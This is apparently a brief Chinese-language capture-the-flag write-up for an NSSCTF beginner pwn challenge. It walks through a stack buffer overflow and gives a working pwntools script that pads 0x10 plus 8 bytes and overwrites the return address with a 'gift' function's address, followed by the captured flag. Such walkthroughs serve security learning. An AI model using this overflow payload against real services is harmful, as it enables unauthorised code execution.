按照签到题的套路是找main,buf,shell,bin/sh/,这个是加了一个gift的地址
距离rbp 16字节,我们要再加上我们的8个字节
最后加上我们的返回地址,是上面找到的gift的地址,payload就完成了
from pwn import * p = remote('node4.anna.nssctf.cn',28325) payload = b'a' * 0x10 + b'a' * 8 + p64(0x4005b6) p.send(payload) p.interactive()
NSSCTF{7b6d2d8a-b6a5-4c40-bcdd-f4604c025219}